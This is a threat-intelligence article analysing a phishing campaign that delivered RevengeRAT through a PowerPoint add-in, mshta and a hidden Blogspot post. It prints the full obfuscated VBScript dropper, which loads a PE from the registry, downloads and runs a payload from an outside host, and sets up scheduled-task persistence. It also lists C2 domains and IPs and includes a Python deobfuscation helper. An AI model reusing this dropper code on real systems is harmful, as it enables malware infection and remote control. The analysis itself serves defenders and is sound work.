The malware was spread through a well-written phishing email impersonating a senior partner of one of the major Brazilian business law firms, “Veirano Advogados”.
The malicious email intercepted during the CSDC operations carries a PowerPoint add-in document (“.ppa” extension) armed with auto-open VBA macro code.
The macro in the .ppa file contains a single instruction that invokes the “mshta.exe” LOLBin to download and execute the next stage of the dropper from “hxxps://minhacasaminhavidacdt.blogspot[.]com/”.
The Blogspot-hosted page fetched by mshta.exe looks innocuous at a glance: opened in a browser, it renders as an ordinary work-in-progress blog page.
A closer look at its source code, however, reveals an interesting snippet inserted into a hidden blog post: this ghost article contains VBScript code.
Amusingly, the malware author tried to attribute the script to “Microsoft Corp.” by pasting in comments taken from a legitimate Microsoft utility:
'Update———————————————————————————————
' Copyright: Microsoft Corp.
'
' This script is designed to be used only for scheduled tasks(s).
' There is no extensive error check, and will not dump the output from the Powershell CmdLet.
'
' Usage: SyncAppvPublishingServer {cmdline-args(passthrough to cmdlet)}
These comments are in fact lifted from the “SyncAppvPublishingServer” utility that ships with Windows 10 at “C:\Windows\System32\SyncAppvPublishingServer.vbs”. The remainder of the script, however, carries out a series of malicious actions: it writes a base64-encoded PE into the registry value HKCU\AppEvents\Values, launches PowerShell through a rundll32/mshtml “RunHTMLApplication” trick so that the assembly is loaded and invoked straight from the registry, writes a second-stage downloader (“Z3j.vbs”) into %TEMP% via a chain of echo commands, and registers a scheduled task (“OfficeData”) that re-runs mshta.exe every 120 minutes against “hxxps://pocasideiascdt.blogspot[.]com/”:
CreateObject("Wscript.Shell").regwrite "HKCU\AppEvents\Values", "TVqQAAMAAAAEAAAA//8AALgAAA.....[continue]" , "REG_SZ"
Set A0102030405 = CreateObject("WScript.Shell")
Dim CDT0908087CDT
CDT0908087CDT = "cmd." + "exe /C rundll32." + "exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""cmd." + "exe /c power" + "shell -" + "Execution" + "Policy Bypass -windows" + "tyle hidden -noexit -Command [Reflection." + "Assembly]::Load([Convert]::FromBase64String((Get-ItemProperty HKCU:\AppEvents).Values)).EntryPoint" + ".Invoke($N" + "ull,$" + "Null)"",0,true);"
A0102030405.run CDT0908087CDT, vbHide
Set XbonXo = CreateObject("WScript.Shell")
Dim XoowA83AC
XoowA83AC = "c" + "M" + "d /c cd %TEMP% &@echo Z6h = ""h" + "t" + "tp://cdtmaster.com.br/Document." + "mp3"">>Z3j.vbs &@echo M2l = M5t(""R]Qc[S\b<SfS"")>>Z3j.vbs &@echo Set M1s = CreateObject(M5t(""[af[Z@<f[ZVbb^""))>>Z3j.vbs &@echo M1s.Open M5t(""USb""), Z6h, False>>Z3j.vbs &@echo M1s.send ("""")>>Z3j.vbs &@echo Set E3i = CreateObject(M5t(""OR]RP<ab`SO[""))>>Z3j.vbs &@echo E3i.Open>>Z3j.vbs &@echo E3i.Type = 1 >>Z3j.vbs &@echo E3i.Write M1s.ResponseBody>>Z3j.vbs & @echo E3i.Position = 0 >>Z3j.vbs &@echo E3i.SaveToFile M2l, 2 >>Z3j.vbs &@echo E3i.Close>>Z3j.vbs &@echo function M5t(N3y) >> Z3j.vbs &@echo For S2r = 1 To Len(N3y) >>Z3j.vbs &@echo E0k = Mid(N3y, S2r, 1) >>Z3j.vbs &@echo E0k = Chr(Asc(E0k)- 14) >>Z3j.vbs &@echo G3f = G3f + E0k >> Z3j.vbs &@echo Next >>Z3j.vbs &@echo M5t = G3f >>Z3j.vbs &@echo End Function >>Z3j.vbs& Z3j.vbs &dEl Z3j.vbs & timeout 2 & DOCUMENT.EXE"
XbonXo.Run XoowA83AC, vbHide
Dim OUGo57658586GFFJHG
Set OUGo57658586GFFJHG = CreateObject("WScript.Shell")
asdmmmc= "c" + "Md /c Sc" + "hTa" + "sks /Cre" + "ate /sc MIN" + "UTE /MO 120 /TN OfficeData /TR ""m" + "sh" + "ta." + "exe h" + "ttp" + "s://pocasideiascdt.blogspot.com/"" /F "
OUGo57658586GFFJHG.Run asdmmmc, vbHide
self.close
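As an added example (not part of the original analysis or of the ZLab report), the following Python script re-implements the dropper's own string tricks so that the commands hidden in the VBScript above can be recovered offline: the Chr(Asc(c) - 14) decoder that Z3j.vbs calls M5t, the "a" + "b" literal concatenation used to keep “cmd.exe”, “powershell” and “schtasks” out of any single string, and the truncated base64 prefix written to HKCU\AppEvents\Values. The literals are copied from the script on the page; the function names and the dictionary layout are mine.

```python
import base64
import re

# Added example, not the dropper's own code: standard-library re-implementation
# of the string tricks used by the VBScript dropper analysed above.


def m5t_decode(obfuscated: str) -> str:
    """Python equivalent of the M5t() function written into Z3j.vbs:
    every character is shifted back by 14 (Chr(Asc(c) - 14))."""
    return "".join(chr(ord(c) - 14) for c in obfuscated)


# A VBScript string literal: anything between double quotes, where a doubled
# quote ("") stands for a literal quote character.
_VBS_LITERAL = re.compile(r'"((?:[^"]|"")*)"')


def join_vbs_concat(vbs_expression: str) -> str:
    """Join the pieces of a VBScript "a" + "b" + "c" expression back into the
    command line the dropper actually runs, unescaping "" to a single quote."""
    pieces = _VBS_LITERAL.findall(vbs_expression)
    return "".join(p.replace('""', '"') for p in pieces)


def registry_blob_prefix(b64_prefix: str) -> bytes:
    """Decode the longest 4-aligned prefix of a truncated base64 string.
    The page shows only the start of the value stored in HKCU\\AppEvents\\Values,
    but that is enough to confirm it is a PE image (DOS 'MZ' header) that the
    PowerShell stage later loads with [Reflection.Assembly]::Load."""
    usable = b64_prefix[: len(b64_prefix) - len(b64_prefix) % 4]
    return base64.b64decode(usable)


# Right-hand sides copied verbatim from the script on the page.
REG_B64_PREFIX = "TVqQAAMAAAAEAAAA//8AALgAAA"

RUNDLL_LINE = (
    r'"cmd." + "exe /C rundll32." + "exe javascript:""\..\mshtml,RunHTMLApplication "";'
    r'document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""cmd." + "exe /c power" + '
    r'"shell -" + "Execution" + "Policy Bypass -windows" + "tyle hidden -noexit -Command [Reflection." + '
    r'"Assembly]::Load([Convert]::FromBase64String((Get-ItemProperty HKCU:\AppEvents).Values)).EntryPoint" + '
    r'".Invoke($N" + "ull,$" + "Null)"",0,true);"'
)

SCHTASKS_LINE = (
    '"c" + "Md /c Sc" + "hTa" + "sks /Cre" + "ate /sc MIN" + "UTE /MO 120 /TN OfficeData /TR ""m" + '
    '"sh" + "ta." + "exe h" + "ttp" + "s://pocasideiascdt.blogspot.com/"" /F "'
)

# Obfuscated strings that the generated Z3j.vbs passes through M5t(); the keys
# are the variable names used in the VBScript.
Z3J_STRINGS = {
    "M2l (output file name)": r"R]Qc[S\b<SfS",
    "M1s (downloader COM object)": "[af[Z@<f[ZVbb^",
    "M1s.Open (HTTP verb)": "USb",
    "E3i (file writer COM object)": "OR]RP<ab`SO[",
}


def decode_dropper() -> dict:
    """Recover every hidden command and string from the script above."""
    return {
        "registry_pe_header": registry_blob_prefix(REG_B64_PREFIX),
        "stage2_command": join_vbs_concat(RUNDLL_LINE),
        "persistence_command": join_vbs_concat(SCHTASKS_LINE).strip(),
        "z3j_strings": {name: m5t_decode(s) for name, s in Z3J_STRINGS.items()},
    }


if __name__ == "__main__":
    for name, value in decode_dropper().items():
        print(f"{name}: {value}")
```

Running the script shows that Z3j.vbs issues an MSXML2.XMLHTTP GET for Document.mp3, writes the response body through an ADODB.Stream to DOCUMENT.EXE in %TEMP%, and that the persistence command is a plain schtasks /Create with the mshta.exe command line quoted inside /TR. The same join_vbs_concat() helper works on the other concatenated literals of the dropper.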
Summing up, the last stages of the infection chain install a RevengeRAT variant hidden in a registry value and run the “outlook.exe” executable extracted by the “Document.exe” binary, which is retrieved from “hxxp://cdtmaster.com[.]br/Document.mp3”.
The following image briefly shows the malware infection chain:
Once executed, the RAT immediately contacts its command and control servers and sends information about the victim machine. In the analyzed sample, the author configured two different C2 destinations: “office365update[.]duckdns.org” and “systen32.ddns[.]net”.
If one of them is down, the malware falls back to the other. At the time of writing both C2 servers were down, so the only option was to emulate the server in order to analyze the information sent by the RAT.
The malware establishes a TCP connection with the server and sends it the following stream:
At first sight it is possible to spot a repeated sequence of characters used as a separator between the data fields:
roma225
This string was chosen by the attacker while preparing the malware, using the customization features of the RevengeRAT builder. Splitting the stream on this separator and decoding the fields, the information becomes clearer:
As noted above, the C2s were unresponsive at the time of writing; however, their latest IP resolutions indicate that the attacker's infrastructure may be spread across different countries.
For instance, the domain “office365update[.]duckdns.org” resolved to the IP address 184.75.209.169, geolocated in Canada.
Moreover, “systen32.ddns[.]net” resolved to the IP address 138.36.3.228, geolocated in Brazil.
The “Document.exe” file is hosted at “cdtmaster.com[.]br” and is downloaded onto the victim machine by the “Z3j.vbs” script. This PE32 file uses a Pokemon Megaball image as its program icon, and its sole purpose is to deploy and run the “Outlook.exe” payload.
Extracting static PE information from this last sample reveals references to “SendBlaster”, an application used to deliver newsletters. Here another interesting fact comes up: this product is developed by the Italian firm eDisplay Srl, which, alongside the “roma225” separator, is another direct reference to the Italian landscape.
When executed, the “Outlook.exe” payload stays apparently quiet: no outgoing network traffic and no file system modifications; however, it binds a listening TCP socket on localhost, “tcp://127.0.0.1:49356”.
Cybaze-Yoroi ZLab researchers are still dissecting the Outlook.exe sample to extract its real behavior.
After this first analysis, it is difficult to attribute the attack to a specific threat actor. In the past, RevengeRAT variants were also used by APT groups such as the Gorgon Group, the enigmatic threat actor tracked by Unit42 researchers and author of cyber espionage campaigns against UK, Spanish, Russian and US governmental organizations. However, the source code of the RAT was publicly leaked a few years ago and could by now be part of a multitude of cyber arsenals, more or less sophisticated.
Still, there are TTPs in common with the Unit42 report, such as the use of shared infrastructure (in this case the Blogger service) as drop server and of other popular RATs as the final backdoor (i.e. njRAT).
In fact, “cdtmaster.com[.]br” hosts other suspicious files such as the “nj.mp3” binary, which is actually an njRAT variant. All the other files are still under investigation.
Technical details about the Roma225
(SecurityAffairs – Roma225, cyberespionage)